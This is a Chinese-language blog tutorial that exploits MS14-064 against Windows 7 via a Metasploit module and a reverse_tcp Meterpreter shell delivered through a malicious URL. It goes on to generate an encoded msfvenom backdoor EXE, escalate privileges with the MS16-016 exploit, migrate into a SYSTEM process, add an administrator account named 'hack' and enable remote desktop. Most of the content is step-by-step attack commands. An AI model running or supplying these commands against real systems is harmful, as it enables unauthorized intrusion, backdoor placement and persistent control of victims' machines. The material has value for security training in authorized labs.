MS14-064 漏洞测试入侵Win7

开始渗透

Microsoft Windows OLE远程代码执行漏洞,OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术.

远程攻击者利用此漏洞通过构造的网站执行任意代码,影响Win95+IE3 – Win10+IE11全版本.

metasploit里已经加入了此漏洞的利用模块 :exploit/windows/browser/ms14_064_ole_code_execution

执行命令:

    msfconsole    //启动MSF

    search ms14   //搜索关键字

    use exploit/windows/browser/ms14_064_ole_code_execution  // 加载漏洞利用模块

    set payload windows/meterpreter/reverse_tcp    //设置反弹连接shell

如图:

20250228193640673-image

 

需要注意的是箭头标记的属性默认为false 需要设置为true ,因为msf中自带的漏洞利用exp调用的是 powershell.

所以msf(Metasploit Framework)中的exp代码只对安装powershell的系统生效。win7系统安装自带powershell,所以这里测试受害的机器为windows7 32位.

按照图中各个属性配置好后 执行:

    exploit

即可 .

20250228193724237-image

 

到一个URL地址,复制到受害者机器(win7)测试

当用户点击允许了后,可以看见这边反弹了一个shell, 测试成功。

用MSF进行提权

在WEB渗透中拿到webshell了,我们可以试试用MSF(metasploit)来进行提权,在MSF里meterpreter很强大的!先用msfvenom生成一个EXE的木马后门:

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=192.168.1.7 LPORT=4444 -f exe > abc.exe

20250228193741514-image

 

然后在到MSF根据刚才配置的木马后门进行监听,然后在把木马上传到服务器(受害者)的机器里,必须上传到可读可写的目录下.

20250228193854776-image

 

这里我把abc.exe上传到了C:usersleakdesktop目录下,abc.exe就是刚才生成的后门.

20250228194047359-image

 

然后在执行的后门,可以看见MSF弹回了一个session 1(会话连接).说明后门程序成功执行起来了,当然你也可以在webshell执行的,但必须的有一点执行的权限.

20250228194107732-image

 

getuid //可以看见权限很低,一般都是user权限的,但也遇到过某些服务器执行后就直接是system最高权限.像这种就直接加用户.

这里是user权限,我们要把它提升到system权限,Windows最高权限。

20250228194117361-image

 

接着输入命令 :

background     //把你当前的metasploit shell转为后台执行。

search ms16 // 搜索关键字相关的漏洞

然后我选择了MS16-016这个漏洞在进行提权 :

use exploit/windows/local/ms16_016_webdav //  选择漏洞

show options  //查看漏洞里边要设置的参数

20250228194136301-image

 

可以看见只有一个SESSION参数要设置 :

set  SESSION 1 // 设置会刚才我们后门连接的ID号 1

20250228194154130-image

 

可以看见成功的吧漏洞利用到了PID为692的进程中,虽然提权成功了 但你getuid下还是看见的是user权限:

ps一下查看进程

20250228194212721-image

 

根据刚才的提示找到PID 692的进程,可以看见确实是system权限.

20250228194224777-image

 

所以还要用到migrate 命令 //迁移到一个指定的进程ID.

migrate 692  //

在getuid下可以看见为system权限 .

20250228194249893-image

 

既然有了system权限 那我们在添加账号hack,添加为管理员组

20250228194258537-image

 

用Nmap扫下并没有开启远程登陆3389 .

run getgui -e  //开启目标主机3389 

20250228194317672-image

 

貌似这条MSF命令只对2003的系统有效 执行几次都没成功 , 所以就用cmd命令开了3389端口 .

20250228194331233-image

 

提权成功,登录服务器 .

© 版权声明
THE END
喜欢就支持一下吧!
点赞224 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容